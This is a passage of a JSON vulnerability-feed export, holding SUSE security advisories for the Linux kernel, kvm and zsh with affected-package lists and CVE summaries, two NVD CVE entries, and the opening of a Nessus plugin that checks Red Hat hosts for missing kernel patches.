"3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-default-base-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-default-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-debugsource-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-default-man-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-default-man", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-ec2-devel-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-ec2-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-source-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-trace-debugsource-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-trace-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-default-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-default-devel-debuginfo-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-default-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-trace-devel-debuginfo-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-trace-devel-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "s390x", "packageFilename": "kernel-trace-debuginfo-3.0.101-108.38.1.s390x.rpm", "packageName": "kernel-trace-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-default-base-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ia64", "packageFilename": "kernel-trace-3.0.101-108.38.1.ia64.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "x86_64", "packageFilename": "kernel-ec2-debuginfo-3.0.101-108.38.1.x86_64.rpm", "packageName": "kernel-ec2-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "ppc64", "packageFilename": "kernel-default-debugsource-3.0.101-108.38.1.ppc64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "3.0.101-108.38.1", "arch": "i586", "packageFilename": "kernel-pae-3.0.101-108.38.1.i586.rpm", "packageName": "kernel-pae", "operator": "lt"}], "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-5715: Systems with microprocessors utilizing speculative\n execution and indirect branch prediction may allow unauthorized\n disclosure of information to an attacker with local user access via a\n side-channel analysis (bnc#1068032).\n\n Enhancements and bugfixes over the previous fixes have been added to\n this kernel.\n\n - CVE-2018-10087: The kernel_wait4 function in kernel/exit.c might have\n allowed local users to cause a denial of service by triggering an\n attempted use of the -INT_MIN value (bnc#1089608).\n - CVE-2018-7757: Memory leak in the sas_smp_get_phy_events function in\n drivers/scsi/libsas/sas_expander.c allowed local users to cause a denial\n of service (memory consumption) via many read accesses to files in the\n /sys/class/sas_phy directory, as demonstrated by the\n /sys/class/sas_phy/phy-1:0:12/invalid_dword_count file (bnc#1084536).\n - CVE-2018-7566: There was a buffer overflow via an\n SNDRV_SEQ_IOCTL_SET_CLIENT_POOL ioctl write operation to /dev/snd/seq by\n a local user (bnc#1083483).\n - CVE-2017-0861: Use-after-free vulnerability in the snd_pcm_info function\n in the ALSA subsystem allowed attackers to gain privileges via\n unspecified vectors (bnc#1088260).\n - CVE-2018-8822: Incorrect buffer length handling in the ncp_read_kernel\n function in fs/ncpfs/ncplib_kernel.c could be exploited by malicious\n NCPFS servers to crash the kernel or execute code (bnc#1086162).\n - CVE-2017-13166: An elevation of privilege vulnerability in the kernel\n v4l2 video driver. (bnc#1072865).\n - CVE-2017-18203: The dm_get_from_kobject function in drivers/md/dm.c\n allowed local users to cause a denial of service (BUG) by leveraging a\n race condition with __dm_destroy during creation and removal of DM\n devices (bnc#1083242).\n - CVE-2017-16911: The vhci_hcd driver allowed allows local attackers to\n disclose kernel memory addresses. Successful exploitation requires that\n a USB device is attached over IP (bnc#1078674).\n - CVE-2017-18208: The madvise_willneed function in mm/madvise.c local\n users to cause a denial of service (infinite loop) by triggering use of\n MADVISE_WILLNEED for a DAX mapping (bnc#1083494).\n - CVE-2017-16644: The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c allowed local users to cause a\n denial of service (improper error handling and system crash) or possibly\n have unspecified other impact via a crafted USB device (bnc#1067118).\n - CVE-2018-6927: The futex_requeue function in kernel/futex.c in the Linux\n kernel might allow attackers to cause a denial of service (integer\n overflow) or possibly have unspecified other impact by triggering a\n negative wake or requeue value (bnc#1080757).\n - CVE-2017-16914: The "stub_send_ret_submit()" function\n (drivers/usb/usbip/stub_tx.c) allowed attackers to cause a denial of\n service (NULL pointer dereference) via a specially crafted USB over IP\n packet (bnc#1078669).\n - CVE-2016-7915: The hid_input_field function in drivers/hid/hid-core.c\n allowed physically proximate attackers to obtain sensitive information\n from kernel memory or cause a denial of service (out-of-bounds read) by\n connecting a device, as demonstrated by a Logitech DJ receiver\n (bnc#1010470).\n - CVE-2015-5156: The virtnet_probe function in drivers/net/virtio_net.c\n attempted to support a FRAGLIST feature without proper memory\n allocation, which allowed guest OS users to cause a denial of service\n (buffer overflow and memory corruption) via a crafted sequence of\n fragmented packets (bnc#940776).\n - CVE-2017-12190: The bio_map_user_iov and bio_unmap_user functions in\n block/bio.c did unbalanced refcounting when a SCSI I/O vector has small\n consecutive buffers belonging to the same page. The bio_add_pc_page\n function merges them into one, but the page reference is never dropped.\n This causes a memory leak and possible system lockup (exploitable\n against the host OS by a guest OS user, if a SCSI disk is passed through\n to a virtual machine) due to an out-of-memory condition (bnc#1062568).\n - CVE-2017-16912: The "get_pipe()" function (drivers/usb/usbip/stub_rx.c)\n allowed attackers to cause a denial of service (out-of-bounds read) via\n a specially crafted USB over IP packet (bnc#1078673).\n - CVE-2017-16913: The "stub_recv_cmd_submit()" function\n (drivers/usb/usbip/stub_rx.c) when handling CMD_SUBMIT packets allowed\n attackers to cause a denial of service (arbitrary memory allocation) via\n a specially crafted USB over IP packet (bnc#1078672).\n\n The following non-security bugs were fixed:\n\n - af_iucv: enable control sends in case of SEND_SHUTDOWN (bnc#1085513,\n LTC#165135).\n - cifs: fix buffer overflow in cifs_build_path_to_root() (bsc#1085113).\n - drm/mgag200: fix a test in mga_vga_mode_valid() (bsc#1087092).\n - hrtimer: Ensure POSIX compliance (relative CLOCK_REALTIME hrtimers)\n (bnc#1013018).\n - hrtimer: Reset hrtimer cpu base proper on CPU hotplug (bnc#1013018).\n - ide-cd: workaround VMware ESXi cdrom emulation bug (bsc#1080813).\n - ipc/msg: introduce msgctl(MSG_STAT_ANY) (bsc#1072689).\n - ipc/sem: introduce semctl(SEM_STAT_ANY) (bsc#1072689).\n - ipc/shm: introduce shmctl(SHM_STAT_ANY) (bsc#1072689).\n - jffs2: Fix use-after-free bug in jffs2_iget()'s error handling path\n (git-fixes).\n - kabi: x86/kaiser: properly align trampoline stack.\n - keys: do not let add_key() update an uninstantiated key (bnc#1063416).\n - keys: prevent creating a different user's keyrings (bnc#1065999).\n - leds: do not overflow sysfs buffer in led_trigger_show (bsc#1080464).\n - mm/mmap.c: do not blow on PROT_NONE MAP_FIXED holes in the stack\n (bnc#1039348).\n - nfsv4: fix getacl head length estimation (git-fixes).\n - pci: Use function 0 VPD for identical functions, regular VPD for others\n (bnc#943786 git-fixes).\n - pipe: actually allow root to exceed the pipe buffer limits (git-fixes).\n - posix-timers: Protect posix clock array access against speculation\n (bnc#1081358).\n - powerpc/pseries: Support firmware disable of RFI flush (bsc#1068032,\n bsc#1075088).\n - qeth: repair SBAL elements calculation (bnc#1085513, LTC#165484).\n - Revert "USB: cdc-acm: fix broken runtime suspend" (bsc#1067912)\n - s390/qeth: fix underestimated count of buffer elements (bnc#1082091,\n LTC#164529).\n - scsi: sr: workaround VMware ESXi cdrom emulation bug (bsc#1080813).\n - usbnet: Fix a race between usbnet_stop() and the BH (bsc#1083275).\n - x86-64: Move the "user" vsyscall segment out of the data segment\n (bsc#1082424).\n - x86/espfix: Fix return stack in do_double_fault() (bsc#1085279).\n - x86/kaiser: properly align trampoline stack (bsc#1087260).\n - x86/retpoline: do not perform thunk calls in ring3 vsyscall code\n (bsc#1085331).\n - xen/x86/asm/traps: Disable tracing and kprobes in fixup_bad_iret and\n sync_regs (bsc#909077).\n - xen/x86/cpu: Check speculation control CPUID bit (bsc#1068032).\n - xen/x86/cpu: Factor out application of forced CPU caps (bsc#1075994\n bsc#1075091).\n - xen/x86/cpu: Fix bootup crashes by sanitizing the argument of the\n 'clearcpuid=' command-line option (bsc#1065600).\n - xen/x86/cpu: Sync CPU feature flags late (bsc#1075994 bsc#1075091).\n - xen/x86/entry: Use IBRS on entry to kernel space (bsc#1068032).\n - xen/x86/idle: Toggle IBRS when going idle (bsc#1068032).\n - xen/x86/kaiser: Move feature detection up (bsc#1068032).\n - xfs: check for buffer errors before waiting (bsc#1052943).\n - xfs: fix allocbt cursor leak in xfs_alloc_ag_vextent_near (bsc#1087762).\n - xfs: really fix the cursor leak in xfs_alloc_ag_vextent_near\n (bsc#1087762).\n\n", "edition": 1, "reporter": "Suse", "published": "2018-04-25T21:07:11", "title": "Security update for the Linux Kernel (important)", "type": "suse", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-8822", "CVE-2017-16913", "CVE-2018-7566", "CVE-2017-0861", "CVE-2017-18203", "CVE-2017-16912", "CVE-2018-6927", "CVE-2018-7757", "CVE-2017-13166", "CVE-2016-7915", "CVE-2017-5715", "CVE-2015-5156", "CVE-2017-18208", "CVE-2017-16911", "CVE-2018-10087", "CVE-2017-16644", "CVE-2017-12190", "CVE-2017-16914"], "modified": "2018-04-25T21:07:11", "id": "SUSE-SU-2018:1080-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-04/msg00072.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-25T19:36:39", "references": ["https://bugzilla.suse.com/1076179", "https://bugzilla.suse.com/1082276", "https://bugzilla.suse.com/1068032", "https://bugzilla.suse.com/1076114", "https://bugzilla.suse.com/1083291"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "1.4.2-60.9.1", "arch": "x86_64", "packageFilename": "kvm-1.4.2-60.9.1.x86_64.rpm", "packageName": "kvm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "1.4.2-60.9.1", "arch": "i586", "packageFilename": "kvm-1.4.2-60.9.1.i586.rpm", "packageName": "kvm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "1.4.2-60.9.1", "arch": "s390x", "packageFilename": "kvm-1.4.2-60.9.1.s390x.rpm", "packageName": "kvm", "operator": "lt"}], "description": "This update for kvm fixes the following issues:\n\n - This update has the next round of Spectre v2 related patches, which now\n integrates with corresponding changes in libvirt. A January 2018 release\n of qemu initially addressed the Spectre v2 vulnerability for KVM guests\n by exposing the spec-ctrl feature for all x86 vcpu types, which was the\n quick and dirty approach, but not the proper solution. We remove that\n initial patch and now rely on patches from upstream. This update defines\n spec_ctrl and ibpb cpu feature flags as well as new cpu models which are\n clones\n of existing models with either -IBRS or -IBPB added to the end of the\n model name. These new vcpu models explicitly include the new\n feature(s), whereas the feature flags can be added to the cpu parameter\n as with other features. In short, for continued Spectre v2 protection,\n ensure that either the appropriate cpu feature flag is added to the\n QEMU command-line, or one of the new cpu models is used. Although\n migration from older versions is supported, the new cpu features won't\n be properly exposed to the guest until it is restarted with the cpu\n features explicitly added. A reboot is insufficient.\n - A warning patch is added which attempts to detect a migration from a\n qemu version which had the quick and dirty fix (it only detects certain\n cases, but hopefully is helpful.) For additional information on Spectre\n v2 as it relates to QEMU, see:\n <a rel=\"nofollow\" href=\"https://www.qemu.org/2018/02/14/qemu-2-11-1-and-spectre-update/\">https://www.qemu.org/2018/02/14/qemu-2-11-1-and-spectre-update/</a>\n (CVE-2017-5715 bsc#1068032)\n - A patch is added to continue to detect Spectre v2 mitigation features\n (as shown by cpuid), and if found provide that feature to guests, even\n if running on older KVM (kernel) versions which do not yet expose that\n feature to QEMU. (bsc#1082276) These two patches will be removed when we\n can reasonably assume everyone is running with the appropriate updates.\n\n - Security fixes for the following CVE issues: (bsc#1076114 CVE-2018-5683)\n (bsc#1083291 CVE-2018-7550)\n - This patch is already included, add here for CVE track (bsc#1076179\n CVE-2017-18030)\n\n - Toolchain changes have cause the built size of pxe-virtio.rom to exceed\n 64K. Tweak rarely used strings in code to reduce size of the binary so\n it fits again.\n\n - Eliminate bogus use of CPUID_7_0_EDX_PRED_CMD which we've carried since\n the initial Spectre v2 patch was added. EDX bit 27 of CPUID Leaf 07H,\n Sub-leaf 0 provides status on STIBP, and not the PRED_CMD MSR. Exposing\n the STIBP CPUID feature bit to the guest is wrong in general, since the\n VM doesn't directly control the scheduling of physical hyperthreads.\n This is left strictly to the L0 hypervisor.\n\n", "edition": 1, "reporter": "Suse", "published": "2018-04-25T18:14:14", "title": "Security update for kvm (important)", "type": "suse", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-5683", "CVE-2017-5715", "CVE-2017-18030", "CVE-2018-7550"], "modified": "2018-04-25T18:14:14", "id": "SUSE-SU-2018:1077-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-04/msg00071.html", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-25T19:36:39", "references": ["https://bugzilla.suse.com/1082977", "https://bugzilla.suse.com/1082991", "https://bugzilla.suse.com/1082998", "https://bugzilla.suse.com/1087026", "https://bugzilla.suse.com/896914", "https://bugzilla.suse.com/1083002", "https://bugzilla.suse.com/1082885", "https://bugzilla.suse.com/1082975", "https://bugzilla.suse.com/1083250", "https://bugzilla.suse.com/1084656"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "ppc64le", "packageFilename": "zsh-debugsource-5.0.5-6.7.2.ppc64le.rpm", "packageName": "zsh-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "ppc64le", "packageFilename": "zsh-debuginfo-5.0.5-6.7.2.ppc64le.rpm", "packageName": "zsh-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "x86_64", "packageFilename": "zsh-debugsource-5.0.5-6.7.2.x86_64.rpm", "packageName": "zsh-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "aarch64", "packageFilename": "zsh-debugsource-5.0.5-6.7.2.aarch64.rpm", "packageName": "zsh-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "s390x", "packageFilename": "zsh-5.0.5-6.7.2.s390x.rpm", "packageName": "zsh", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "ppc64le", "packageFilename": "zsh-5.0.5-6.7.2.ppc64le.rpm", "packageName": "zsh", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "aarch64", "packageFilename": "zsh-debuginfo-5.0.5-6.7.2.aarch64.rpm", "packageName": "zsh-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "s390x", "packageFilename": "zsh-debugsource-5.0.5-6.7.2.s390x.rpm", "packageName": "zsh-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "x86_64", "packageFilename": "zsh-5.0.5-6.7.2.x86_64.rpm", "packageName": "zsh", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "s390x", "packageFilename": "zsh-debuginfo-5.0.5-6.7.2.s390x.rpm", "packageName": "zsh-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "x86_64", "packageFilename": "zsh-debuginfo-5.0.5-6.7.2.x86_64.rpm", "packageName": "zsh-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "x86_64", "packageFilename": "zsh-debuginfo-5.0.5-6.7.2.x86_64.rpm", "packageName": "zsh-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "aarch64", "packageFilename": "zsh-5.0.5-6.7.2.aarch64.rpm", "packageName": "zsh", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "x86_64", "packageFilename": "zsh-debugsource-5.0.5-6.7.2.x86_64.rpm", "packageName": "zsh-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12.3", "packageVersion": "5.0.5-6.7.2", "arch": "x86_64", "packageFilename": "zsh-5.0.5-6.7.2.x86_64.rpm", "packageName": "zsh", "operator": "lt"}], "description": "This update for zsh fixes the following issues:\n\n - CVE-2014-10070: environment variable injection could lead to local\n privilege escalation (bnc#1082885)\n\n - CVE-2014-10071: buffer overflow in exec.c could lead to denial of\n service. (bnc#1082977)\n\n - CVE-2014-10072: buffer overflow In utils.c when scanning very long\n directory paths for symbolic links. (bnc#1082975)\n\n - CVE-2016-10714: In zsh before 5.3, an off-by-one error resulted in\n undersized buffers that were intended to support PATH_MAX characters.\n (bnc#1083250)\n\n - CVE-2017-18205: In builtin.c when sh compatibility mode is used, a\n NULL pointer dereference could lead to denial of service (bnc#1082998)\n\n - CVE-2018-1071: exec.c:hashcmd() function vulnerability could lead to\n denial of service. (bnc#1084656)\n\n - CVE-2018-1083: Autocomplete vulnerability could lead to privilege\n escalation. (bnc#1087026)\n\n - CVE-2018-7549: In params.c in zsh through 5.4.2, there is a crash\n during a copy of an empty hash table, as demonstrated by typeset -p.\n (bnc#1082991)\n\n - CVE-2017-18206: buffer overrun in xsymlinks could lead to denial of\n service (bnc#1083002)\n\n - Autocomplete and REPORTTIME broken (bsc#896914)\n\n", "edition": 1, "reporter": "Suse", "published": "2018-04-25T18:07:15", "title": "Security update for zsh (important)", "type": "suse", "enchantments": {}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-1071", "CVE-2017-18206", "CVE-2014-10071", "CVE-2016-10714", "CVE-2018-1083", "CVE-2018-7549", "CVE-2014-10072", "CVE-2017-18205", "CVE-2014-10070"], "modified": "2018-04-25T18:07:15", "id": "SUSE-SU-2018:1072-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-04/msg00070.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2018-04-26T10:57:39", "references": ["https://security.netapp.com/advisory/ntap-20180425-0001/"], "description": "NetApp OnCommand Unified Manager for Linux versions 7.2 though 7.3 ship with the Java Debug Wire Protocol (JDWP) enabled which allows unauthorized local attackers to execute arbitrary code.", "edition": 1, "reporter": "NVD", "published": "2018-04-25T17:29:00", "title": "CVE-2018-5486", "type": "cve", "enchantments": {}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-5486"], "scanner": [], "modified": "2018-04-25T17:29:00", "cpe": [], "id": "CVE-2018-5486", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5486", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-26T10:56:56", "references": ["https://bugs.eclipse.org/bugs/show_bug.cgi?id=530102"], "description": "In Eclipse Mosquitto 1.4.14, if a Mosquitto instance is set running with a configuration file, then sending a HUP signal to server triggers the configuration to be reloaded from disk. If there are lots of clients connected so that there are no more file descriptors/sockets available (default limit typically 1024 file descriptors on Linux), then opening the configuration file will fail.", "edition": 1, "reporter": "NVD", "published": "2018-04-25T09:29:00", "title": "CVE-2017-7652", "type": "cve", "enchantments": {}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2017-7652"], "scanner": [], "modified": "2018-04-25T09:29:00", "cpe": [], "id": "CVE-2017-7652", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7652", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2018-04-26T02:17:01", "references": ["https://www.redhat.com/security/data/cve/CVE-2017-8824.html", "http://rhn.redhat.com/errata/RHSA-2018-1216.html"], "pluginID": "109336", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.2 Advanced Update Support, Red Hat Enterprise Linux 7.2 Telco Extended Update Support, and Red Hat Enterprise Linux 7.2 Update Services for SAP Solutions.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es) :\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824, Important)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Mohamed Ghannam for reporting this issue.\n\nBug Fix(es) :\n\n* Previously, the XFS code included a circular dependency between the xfs-log and the xfs-cil workqueues. Consequently, an XFS deadlock occurred in some cases. This update adds a new workqueue dedicated to the log covering background task to avoid the deadlock. (BZ#1543303)\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines.\nThe Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1553181)", "edition": 1, "reporter": "Tenable", "published": "2018-04-25T00:00:00", "title": "RHEL 7 : kernel (RHSA-2018:1216)", "type": "nessus", "enchantments": {}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8824"], "modified": "2018-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:7.2", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2018-1216.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=109336", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1216. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109336);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/04/25 13:43:12\");\n\n script_cve_id(\"CVE-2017-8824\");\n script_xref(name:\"RHSA\", value:\"2018:1216\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2018:1216)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.2\nAdvanced Update Support, Red Hat Enterprise Linux 7.2 Telco Extended\nUpdate Support, and Red Hat Enterprise Linux 7.2 Update Services for\nSAP Solutions.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824,\nImportant)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nRed Hat would like to thank Mohamed Ghannam for reporting this issue.\n\nBug Fix(es) :\n\n* Previously, the XFS code included a circular dependency between the\nxfs-log and the xfs-cil workqueues. Consequently, an XFS deadlock\noccurred in some cases. This update adds a new workqueue dedicated to\nthe log covering background task to avoid the deadlock. (BZ#1543303)\n\n* The kernel build requirements have been updated to the GNU Compiler\nCollection (GCC) compiler version that has the support for Retpolines.\nThe Retpolines mechanism is a software construct that leverages\nspecific knowledge of the underlying hardware to mitigate the branch\ntarget injection, also known as Spectre variant 2 vulnerability\ndescribed in CVE-2017-5715. (BZ#1553181)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2018-1216.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2017-8824.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n 